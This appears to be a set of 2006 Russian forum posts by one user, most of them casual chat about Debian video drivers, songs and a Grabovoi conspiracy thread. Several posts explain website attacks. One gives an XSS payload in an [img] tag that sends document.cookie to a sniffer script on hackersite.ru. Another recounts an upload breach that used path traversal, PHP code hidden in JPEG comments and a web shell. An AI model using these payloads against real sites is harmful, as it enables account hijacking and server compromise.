Муаддиб

QUOTE (Eol @ Jul 24 2006, 12:59) ... что, совсем никто не хочет себе сей чудесный девайс? ... Можа я возьму, но где-то через неделю-две у тя там случайно shadow of the colossus нет?

Большое спасибо, теперь мыши на экране не тесноhttp://forum.academ.org/html/emoticons/smile.gif 2 iDamir: ставил вручную, т.к. в apt-репозитории нгу не нашел, только в пуле. В связи с этим вопрос: а какой репозиторий у Вас?

Кетчуп однозначно! И как еще тут никто не вспомнил Джимми Тюльпана?

Поставил себе Debian, дрова для видеокарты ati не шли(gdm при запуске ругался, выкидывал в консоль), пришлось поставить vesa(как это делается по-нормальному не знаю, пришлось переустанавливать). В результате теперь разрешение не больше 800 на 600. В связи с этим вопросы: 1)Какие все-таки надо было брать?(карта ATI RADEON 9250) 2)А где их можно поменять без переустановки? PS: Ногами не бить! По крайней мере, по голове...

QUOTE (Random @ Jul 23 2006, 02:34) QUOTE (Муаддиб @ Jul 22 2006, 17:16) сам код посылает cookies юзеров на некий РНР скрипт, который с ними делает что? правильно, тырит! Вот мне всегда было интересно, как и куда пхп скрипт получает куки, отправленные через +document.cookie ? поедает через $QUERY_STRING или я чото п? в данном примере ее тупо отсылали на чей-то мэйл многие пользователи входят автоматически(запомнить меня), следовательно, подменив cookies на полученные, можем залезть в чужой аккаунт

QUOTE (kleepa @ Jul 22 2006, 21:36) QUOTE (nancy @ Jul 22 2006, 16:02) QUOTE (kleepa @ Jul 21 2006, 21:49) На небе вороны, под небом монахи и я между ними в расшитой рубахе...... ДДТ название, кажется, Белая птица Название сама не помню, по моему тоже "белая птица". Вороны such a lonely day and it's mine - System of a down - lonely day If you're 555 then I'm 666

Даёшь полный список игр!

QUOTE (zO_om @ Jul 22 2006, 18:45) QUOTE (Муаддиб @ Jul 22 2006, 18:16) На сайте не проверялось наличие кавычек -> ставя " закрываешь свво src. Потом открывали style и посредством него выполняли произвольный джаваскрипт. Проблема была следующей: при обработке сообщения скрипт ругался на слово джаваскрипт -> его пришлось закодировать сам код посылает cookies юзеров на некий РНР скрипт, который с ними делает что? правильно, тырит! Ну кавычки фиксятся, я просто сходу не помню, чем. Тоже довольно-таки элементарная ошибка.. Суть в том, что элементарных ошибок много, и не всегда про все помнишь

На сайте не проверялось наличие кавычек -> ставя " закрываешь свво src. Потом открывали style и посредством него выполняли произвольный джаваскрипт. Проблема была следующей: при обработке сообщения скрипт ругался на слово джаваскрипт -> его пришлось закодировать сам код посылает cookies юзеров на некий РНР скрипт, который с ними делает что? правильно, тырит!

QUOTE (zO_om @ Jul 22 2006, 17:19)Мда, ну и пример... Просто набор глупостей. Переименовывать загруженную картинку? Нафига? Я обычно загружаемую картинку переименовываю timestamp().random(0,99) автоматически.. Регаться по хэшу? Полный ахтунг.. В том-то и фишка хэша, что, даже получив доступ до базы юзеров, ты увидишь только хэши, и не сломаешь никак, кроме перебора. И вообще, preg_match. Вобщем, если это всё, что можно сделать через заливку файла - то моим скриптам ничего не грозит =) где твой сайт? http://forum.academ.org/html/emoticons/smile.gif Насчет переименования картинки - просто этот ресурс предназначался для хранения н-ого колва картинок на пользователя, чтобы в ЖЖ их использовать Также вариант: на форуме типа этого, где можно было вставлять картинки при помощи тегов, падонак написал [img="style=background:url(/*javascript в десятичной записи*/:document.images[0].src="http://www.hackersite.ru/sniff.php?"+document.cookie);] Как нетрудно понять, содержимое тега подставлялось в атрибут src картинки в кавычках

QUOTE (Глория @ Jul 22 2006, 16:51) Читайте публикации Надежды Поповой в газете<<Известия>>04июля 2006г.и от сотрудника спецслужбы Узбекистана.Впубликации<<Кола Буф-<<Известиям>>:<<Осаму охраняли чеченцы>>. Мы ленивые и у нас траффика нетhttp://forum.academ.org/html/emoticons/smile.gif Цитатку в студию

QUOTE (zO_om @ Jul 22 2006, 16:45) QUOTE (SunRabbit @ Jul 22 2006, 09:55) в местах, где через скрипты загружаются файлы на систему: в 90% случаев взломы происходят через дыры в в этих местах, злоумышленнику обычно достаточно загрузить _свой_ файл, а его исполнение на сервере уже дело техники. Господа, очень заинтересован, а нельзя ли поконкретнее, с небольшими примерчиками? Как можно сломать сайт через загрузку файлов? Примерчик из ][akep(первый попавшийся, старый) Взлом lj.com.ua Если вкратце: На сайт можно было заливать картинки, переименовывать их итд Во-первых: не было проверок пути файла, поставив ../../../../../../../ можно было стырить любой файл Во-вторых не было проверки расширения файла, картинку можно было переименовать в скрипт В-третьих:Картинки проверялись на подлинность, но комментарии в них можно было писать какие угодно. Чувак в jpeg в тэгах писал команды php(например <?system("id");?>), потом заливал на сайт, переименовывал и читал их вывод. Скомандовал на скачивание файла php выполняющего его команды(чтобы не париться с комментами), залил эксплойт, меняющий владельца файла/папки, слил базу данных пользователей, получил логины и хэши паролей. Регаться на сайте можно было по хэшу пароля, и чувак получил доступ ко всем аккаунтам

QUOTE (Глория @ Jul 21 2006, 23:38)Международный терроризм оплатил на самые верхи против Учения Г.Г более чем 270 миллионов долларов. А кто-нибудь может объяснить, зачем? Только без отмазок типа "террористы плохие а ГГ хороший, не может же зло терпеть добро". Если я правильно понимаю суть "международного терроризма", этими людьми движет идея мести "неверным". В дли-и-инном ряду религий и сект Грабовой занимает далеко не первое место. Почему, например, "терроризм" не оплатил устранение Папы Римского? Кстати, если бы "терроризм" захотел избавится от Грабового, гораздо проще и дешевле было бы нанять киллера. Или науськать на него парочку бородатых отмороженных смертников. Насчет администрации Президента. Вряд ли этим людям хочется "светиться" с устранением никому из них, в общем-то, не мешающего "мессии" и со связями с международным терроризмом. Какие у них могут быть мотивы? "Программа" Грабового с его "законом о запрете смерти"? Ну, во-первых сам Путин на третий срок балотироваться не будет. Пусть он готовит место для своего преемника. Но рейтинг Путина довольно высок, и если он скажет, кого хочет видеть будущим президентом, вполне вероятно, что так и будет (вспоминаем Ельцина). В то же время, я сомневаюсь, что Грабовой со своими тезисами наберет сколько-нибуть приличный процент голосов - сколько-нибудь серьёзных политических и экономических идей я у него не заметил, а большинство здравомыслящих людей(я надеюсь, что в России их немало) проголосует против него если услышат его "тезисы". Президент - это прежде всего глава исполнительной власти страны, а не её церкви. Насколько я помню, тот же Иисус никогда не стремился к официальному признанию его "царем иудейским", вместо этого воскрешая мертвых, кормя голодных пятью хлебами и проповедуя христианство(Кстати, он по воде ходил. А Грабовой может?). Ему светская власть была не нужна. Возвращаясь к "устранению" Грабового: слабо верится, что российская верхушка сговорилась с "терроризмом", с которым находится в состоянии войны, дабы совместно, за большие деньги, избавится от одного человека. Чтобы такое произошло, должны быть ооочень веские причины. Например, они должны были признать его мессией - но, опять же, зачем убивать того, кто все равно воскреснет, кроме того вступая в конфронтацию с Богом? В общем, непонятно. Объяснитесь, плз. ЗЫ: Я не бог весть какой знаток христианства, но по-моему там второе пришествие Христа связывалось с чем-то очень неприятным. Или нет?